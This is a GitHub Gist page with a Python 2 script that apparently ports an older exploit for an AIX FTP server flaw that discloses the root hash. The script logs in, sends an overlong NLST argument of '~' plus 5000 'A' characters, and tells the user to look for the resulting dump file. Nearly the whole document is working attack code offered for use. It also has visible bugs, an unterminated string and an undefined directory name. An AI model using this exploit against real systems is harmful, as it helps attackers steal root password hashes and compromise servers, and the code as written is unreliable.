Created
January 24, 2016 00:14
-
-
Save Graph-X/2dd06944de59be8b5e91 to your computer and use it in GitHub Desktop.
rewrite of Kingcopes AIX FTP root hash disclosure vuln
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
################### | |
# | |
# | |
# | |
# Rewrite of Kingcopes AIX FTP root hash disclosure vuln | |
# Conversion by GraphX | |
# Because fuck Perl | |
# | |
####################################################### | |
from ftplib import FTP | |
import io | |
import os | |
import sys, getopt | |
def main (argv): | |
host = '' | |
user = '' | |
password = '' | |
try: | |
opts, args = getopt.getopt(argv,"h:u:p:",["host=","user=","password="]) | |
except getopt.GetoptError: | |
print 'ftpdump.py usage: ftpdump.py -h <host> -u <username> -p <password> | |
sys.exit(2) | |
for opt, arg in opts: | |
if opt == '-h': | |
host = arg | |
elif opt == '-u': | |
user = arg | |
elif opt == '-p': | |
password = arg | |
fexploit(host,user,password) | |
def fexploit(h,u,p): | |
buff = 'A'*5000 | |
ftp = FTP(h) | |
try: | |
print '[*] attempting FTP login' | |
ftp.login(u,p) | |
print '[*] using pub directory' | |
ftp.cwd(pub) | |
print '[*] attempting to trigger vulnerability' | |
ftp.nlst('~' + buff) | |
print '[*] no errors, I think we\'re good. Go look for that dump file' | |
except Exception, e: | |
print str(e) | |
if __name__ == "__main__": | |
main(sys.argv[1:]) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment